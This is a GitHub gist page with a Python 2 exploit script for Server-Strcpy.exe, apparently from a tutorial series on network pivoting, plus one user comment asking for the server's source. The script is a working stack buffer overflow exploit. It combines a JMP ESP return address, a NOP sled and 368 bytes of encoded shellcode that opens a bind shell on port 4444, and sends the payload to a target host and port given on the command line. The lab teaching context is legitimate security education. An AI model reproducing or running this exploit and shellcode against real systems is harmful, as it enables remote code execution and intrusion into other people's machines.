Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit for Server-Strcpy.exe in the Introduction to Pivoting series.
#!/usr/bin/env python
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
import socket, sys
def main(target, port):
# 368 bytes, opens a bind TCP shell on port 4444
shellcode = (
"\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\x7d\x06\xb8\x9b" +
"\x95\x4f\x43\x64\x65\x30\xcd\x81\x54\x62\xa9\xc2\xc4\xb2" +
"\xb9\x87\xe4\x39\xef\x33\x7f\x4f\x38\x33\xc8\xfa\x1e\x7a" +
"\xc9\xca\x9e\xd0\x09\x4c\x63\x2b\x5d\xae\x5a\xe4\x90\xaf" +
"\x9b\x19\x5a\xfd\x74\x55\xc8\x12\xf0\x2b\xd0\x13\xd6\x27" +
"\x68\x6c\x53\xf7\x1c\xc6\x5a\x28\x8c\x5d\x14\xd0\xa7\x3a" +
"\x85\xe1\x64\x59\xf9\xa8\x01\xaa\x89\x2a\xc3\xe2\x72\x1d" +
"\x2b\xa8\x4c\x91\xa6\xb0\x89\x16\x58\xc7\xe1\x64\xe5\xd0" +
"\x31\x16\x31\x54\xa4\xb0\xb2\xce\x0c\x40\x17\x88\xc7\x4e" +
"\xdc\xde\x80\x52\xe3\x33\xbb\x6f\x68\xb2\x6c\xe6\x2a\x91" +
"\xa8\xa2\xe9\xb8\xe9\x0e\x5c\xc4\xea\xf7\x01\x60\x60\x15" +
"\x56\x12\x2b\x72\x9b\x29\xd4\x82\xb3\x3a\xa7\xb0\x1c\x91" +
"\x2f\xf9\xd5\x3f\xb7\xfe\xcc\xf8\x27\x01\xee\xf8\x6e\xc6" +
"\xba\xa8\x18\xef\xc2\x22\xd9\x10\x17\xe4\x89\xbe\xc7\x45" +
"\x7a\x7f\xb7\x2d\x90\x70\xe8\x4e\x9b\x5a\x9f\x48\x55\xbe" +
"\xcc\x3e\x94\x40\xe3\xe2\x11\xa6\x69\x0b\x74\x70\x05\xe9" +
"\xa3\x49\xb2\x12\x86\xe5\x6b\x85\x9e\xe3\xab\xaa\x1e\x26" +
"\x98\x07\xb6\xa1\x6a\x44\x03\xd3\x6d\x41\x23\x9a\x56\x02" +
"\xb9\xf2\x15\xb2\xbe\xde\xcd\x57\x2c\x85\x0d\x11\x4d\x12" +
"\x5a\x76\xa3\x6b\x0e\x6a\x9a\xc5\x2c\x77\x7a\x2d\xf4\xac" +
"\xbf\xb0\xf5\x21\xfb\x96\xe5\xff\x04\x93\x51\x50\x53\x4d" +
"\x0f\x16\x0d\x3f\xf9\xc0\xe2\xe9\x6d\x94\xc8\x29\xeb\x99" +
"\x04\xdc\x13\x2b\xf1\x99\x2c\x84\x95\x2d\x55\xf8\x05\xd1" +
"\x8c\xb8\x36\x98\x8c\xe9\xde\x45\x45\xa8\x82\x75\xb0\xef" +
"\xba\xf5\x30\x90\x38\xe5\x31\x95\x05\xa1\xaa\xe7\x16\x44" +
"\xcc\x54\x16\x4d")
# JMP ESP at 77DF2740
buffer = "\x41" * 268 + "\x40\x27\xDF\x77"
buffer += "\x90" * 20 + shellcode + "\xCC" * 819
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, int(port)))
print "[+] sending payload of length", len(buffer)
s.send(buffer)
s.close()
print "[+] done"
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2])
@samouelll

This comment has been minimized.

Show comment
Hide comment
@samouelll

samouelll Nov 18, 2017

hi.
where is source code of strcpy.server.exe?

samouelll commented Nov 18, 2017

hi.
where is source code of strcpy.server.exe?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment